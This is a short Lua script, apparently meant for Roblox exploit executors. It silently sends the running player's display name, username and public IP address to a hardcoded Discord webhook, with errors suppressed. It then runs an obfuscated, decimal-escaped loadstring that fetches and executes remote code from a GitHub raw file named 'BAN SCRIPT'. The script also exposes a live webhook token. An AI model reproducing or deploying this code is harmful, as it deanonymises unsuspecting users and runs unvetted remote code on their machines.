local webh = "https://discord.com/api/webhooks/973289362433400873/AskRmQHJiIY7BalRpNgVvChT7jQKtHWMx6k5aUgteYhKvWPG3DYiiDcC_LQPVo16Yv_G"

pcall(function()
   local data = {
       ["embeds"] = {
           {
               ["title"] = "Someone Executed Ur Script \n Display Name : "..game.Players.LocalPlayer.DisplayName.."\n User : "..game.Players.LocalPlayer.Name,
               ["description"] = "IP Adress : " ..game:HttpGet("https://api.ipify.org")
           }
       }
   }

   if krnl or syn then
       local response = krnl or syn.request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif request then
       local response = request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif http_request then
       local response = http_request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );

   end
end)

loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\69\122\100\114\111\112\49\49\47\83\72\72\72\72\47\109\97\105\110\47\66\65\78\37\50\48\83\67\82\73\80\84\34\41\41\40\41\10")()
